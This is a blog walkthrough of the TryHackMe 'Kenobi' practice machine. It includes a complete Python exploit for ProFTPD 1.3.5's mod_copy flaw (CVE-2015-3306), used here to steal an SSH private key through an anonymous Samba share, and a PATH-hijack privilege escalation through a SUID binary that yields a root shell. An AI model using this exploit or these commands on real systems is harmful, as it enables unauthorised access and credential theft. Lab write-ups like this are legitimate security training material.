BLOG

Kenobi[Tryhackme]

Mar 3, 2022 | 8 minutes read
Share this:

Categories: walkthrough

Tags: tryhackme, Linux-Machine, CVE-2015-3306, PrivEsc, PrivEsc-Linux, Path-PrivEsc, Path

Kenobi Walkthrough

$ nmap -p- 10.10.245.2
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 11:49 IST
Initiating Ping Scan at 11:49
Scanning 10.10.245.2 [2 ports]
Completed Ping Scan at 11:49, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:49
Completed Parallel DNS resolution of 1 host. at 11:49, 2.19s elapsed
DNS resolution of 1 IPs took 2.19s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 11:49
Scanning 10.10.245.2 [11 ports]
Discovered open port 21/tcp on 10.10.245.2
Discovered open port 111/tcp on 10.10.245.2
Discovered open port 445/tcp on 10.10.245.2
Discovered open port 80/tcp on 10.10.245.2
Discovered open port 139/tcp on 10.10.245.2
Discovered open port 22/tcp on 10.10.245.2
Discovered open port 56665/tcp on 10.10.245.2
Discovered open port 37907/tcp on 10.10.245.2
Discovered open port 60413/tcp on 10.10.245.2
Discovered open port 49195/tcp on 10.10.245.2
Discovered open port 2049/tcp on 10.10.245.2
Completed Connect Scan at 11:49, 0.32s elapsed (11 total ports)
Nmap scan report for 10.10.245.2
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-06-26 11:49:45 IST for 2s

PORT      STATE SERVICE      REASON
21/tcp    open  ftp          syn-ack
22/tcp    open  ssh          syn-ack
80/tcp    open  http         syn-ack
111/tcp   open  rpcbind      syn-ack
139/tcp   open  netbios-ssn  syn-ack
445/tcp   open  microsoft-ds syn-ack
2049/tcp  open  nfs          syn-ack
37907/tcp open  unknown      syn-ack
49195/tcp open  unknown      syn-ack
56665/tcp open  unknown      syn-ack
60413/tcp open  unknown      syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.74 seconds

$ nmap -sV -sC -p21,22,80,111,139,445,2049,37907,49195,56665,60413 10.10.245.2
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 11:52 IST
Nmap scan report for 10.10.245.2
Host is up (0.16s latency).

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         ProFTPD 1.3.5
22/tcp    open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_  256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp    open  http        Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      40951/tcp6  mountd
|   100005  1,2,3      43471/udp   mountd
|   100005  1,2,3      45190/udp6  mountd
|   100005  1,2,3      56665/tcp   mountd
|   100021  1,3,4      36497/udp   nlockmgr
|   100021  1,3,4      37907/tcp   nlockmgr
|   100021  1,3,4      41275/tcp6  nlockmgr
|   100021  1,3,4      45173/udp6  nlockmgr
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     2-3 (RPC #100227)
37907/tcp open  nlockmgr    1-4 (RPC #100021)
49195/tcp open  mountd      1-3 (RPC #100005)
56665/tcp open  mountd      1-3 (RPC #100005)
60413/tcp open  mountd      1-3 (RPC #100005)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -2s
|_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2021-06-26T01:23:10-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-26T06:23:10
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.28 seconds

CVE-2015-3306 -> Remote command Execution

CVE-2016-6210 -> Username Enumeration

CVE-2016-6210 -> Local Privilege Escalation

No Juicy Information

139/tcp netbios-ssn Samba 3.x - 4.x

No Juicy Information

$ smbclient -N -L \\\\10.10.245.2\\

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk
        IPC$            IPC       IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

$ smbclient -N \\\\10.10.245.2\\anonymous
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Sep  4 16:19:09 2019
  ..                                  D        0  Wed Sep  4 16:26:07 2019
  log.txt                             N    12237  Wed Sep  4 16:19:09 2019

                9204224 blocks of size 1024. 6877100 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (14.8 KiloBytes/sec) (average 14.8 KiloBytes/sec)
smb: \>

$ cat log.txt
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/kenobi/.ssh/id_rsa.
Your public key has been saved in /home/kenobi/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:C17GWSl/v7KlUZrOwWxSyk+F7gYhVzsbfqkCIkr2d7Q kenobi@kenobi

[anonymous]
   path = /home/kenobi/share
   browseable = yes
   read only = yes
   guest ok = yes

No Juicy Information

By using proftpd RCE and Information availabe using samba log.txt, we will copy the id_rsa to samba share

SSH Private Key Information

Generating public/private rsa key pair.
Enter file in which to save the key (/home/kenobi/.ssh/id_rsa):
Created directory '/home/kenobi/.ssh'.o

Samba Share Information

[anonymous]
   path = /home/kenobi/share

Exploit Code

#!/bin/python3
import socket
from threading import Thread
from sys import argv as _arg_
from time import sleep
'''
proftpd 1.3.5 is Vulnearable to Copy Remote Command Execution
usage: proftpd_1.3.5.py <TARGET_IP> <PORT> <PATH_TO_COPY> <PATH_TO_PAST>
   eg: proftpd_1.3.5.py 10.2.43.12 21 /home/user/FileToCopy /var/tmp/PathToPast
'''
def main():
    core = {
        "MAIN": {
            "COPY": b"SITE CPFR ",
            "PAST": b"SITE CPTO ",
        },
        "PRINT": {
            "SUCCESS": "[*] Conection status\t[ok]",
            "FAIL": "[!] Conection status\t[PipeBroken]",
            "OUT": "[RES] ",
            "TITLE": "\n[*] proftpd 1.3.5 is Vulnearable to Copy Remote Command Execution"
        },
        "LN": "\n",
        "ENCODE": "UTF-8",
        "SIZE": 1024
    }
    IP = _arg_[1]
    PORT = int(_arg_[2])
    CPFROM = _arg_[3]+core["LN"]
    CPTO = _arg_[4]+core["LN"]

    def recive(PROFTPD135, core):
        for i in range(1, 4):
            print(core["PRINT"]["OUT"] + PROFTPD135.recv(core["SIZE"]).decode(core["ENCODE"]), end="")
            sleep(0.2)
    try:
        PROFTPD135 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        PROFTPD135.connect((IP, PORT))
        print(core["PRINT"]["SUCCESS"]+core["PRINT"]["TITLE"])
        Thread(target=recive, args=(PROFTPD135, core,)).start()
        PROFTPD135.send(core["MAIN"]["COPY"]+CPFROM.encode(core["ENCODE"]))
        PROFTPD135.send(core["MAIN"]["PAST"]+CPTO.encode(core["ENCODE"]))
        sleep(10)
        PROFTPD135.close()
        raise SystemExit()
    except:
        print(core["PRINT"]["FAIL"])

try:
    if __name__ == "__main__":
        main()
except:
    print(_arg_[0]+" <TARGET_IP> <PORT> <PATH_TO_COPY> <PATH_TO_PAST>")

Exploitation

$ python3 proexploit.py 10.10.245.2 21 /home/kenobi/.ssh/id_rsa /home/kenobi/share/id_rsa.txt
[*] Conection status    [ok]
[*] proftpd 1.3.5 is Vulnearable to Copy Remote Command Execution
[RES] 220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.245.2]
350 File or directory exists, ready for destination name
[RES] 250 Copy successful

Getting PrivateKey of Kenobi

$ smbclient -N \\\\10.10.245.2\\anonymous
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Jun 26 13:06:42 2021
  ..                                  D        0  Wed Sep  4 16:26:07 2019
  id_rsa.txt                          N     1675  Sat Jun 26 13:06:42 2021
  log.txt                             N    12237  Wed Sep  4 16:19:09 2019
g
                9204224 blocks of size 1024. 6877092 blocks available
smb: \> get id_rsa.txt
getting file \id_rsa.txt of size 1675 as id_rsa.txt (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \>

Login to machine using privatekey of kenobi and getting the user flag

$ mv id_rsa.txt id_rsa
$ chmod 600 id_rsa
$ ssh -i id_rsa [email protected]
The authenticity of host '10.10.245.2 (10.10.245.2)' can't be established.
ECDSA key fingerprint is SHA256:uUzATQRA9mwUNjGY6h0B/wjpaZXJasCPBY30BvtMsPI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.245.2' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

kenobi@kenobi:~
kenobi@kenobi:~ cat user.txt

user

kenobi@kenobi:~$ find / -type f -perm /4000 2> /dev/null
/sbin/mount.nfs
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/newuidmap
/usr/bin/gpasswd
/usr/bin/menu
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/at
/usr/bin/newgrp
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
/bin/su
/bin/ping6

/usr/bin/menu looks odd on in the list

Lets run the binary and check what it is doing.

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :2
4.8.0-58-generic

Noting much useful. run strings on binary

kenobi@kenobi:~$ strings /usr/bin/menu
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
__isoc99_scanf
puts
__stack_chk_fail
printf
system
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
UH-`
AWAVA
AUATL
[]A\A]A^A_
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :
curl -I localhost
uname -r
ifconfig
 Invalid choice
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.11) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7594
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
menu.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__isoc99_scanf@@GLIBC_2.7
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

curl and uname are available in strings

use one of them to manipulate the /usr/bin/menu and get root shell**

kenobi@kenobi:~$ cat /etc/shells
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen
kenobi@kenobi:~$ ls -l /bin/sh /bin/dash /bin/bash /bin/rbash /usr/bin/tmux /usr/bin/screen
-rwxr-xr-x 1 root root 1037528 May 16  2017 /bin/bash
-rwxr-xr-x 1 root root  154072 Feb 17  2016 /bin/dash
lrwxrwxrwx 1 root root       4 Sep  4  2019 /bin/rbash -> bash
lrwxrwxrwx 1 root root       4 Sep  4  2019 /bin/sh -> dash
-rwxr-sr-x 1 root utmp  434216 Feb  7  2016 /usr/bin/screen
-rwxr-xr-x 1 root root  512712 Feb  7  2016 /usr/bin/tmux
kenobi@kenobi:~$

/bin/rbash and /bin/sh has o+rwx permissions

echo or cat the contents of /bin/sh to curl And change the permissions of curl

kenobi@kenobi:~$ echo /bin/sh > curl
kenobi@kenobi:~$ chmod 777 curl

export the path

kenobi@kenobi:~$ export PATH=/home/kenobi:$PATH

Run /usr/bin/menu to get on root shell

kenobi@kenobi:~$ /usr/bin/menu

***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :1
# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
#

Get root flag

# cd /root
# ls
root.txt
# cat root.txt

root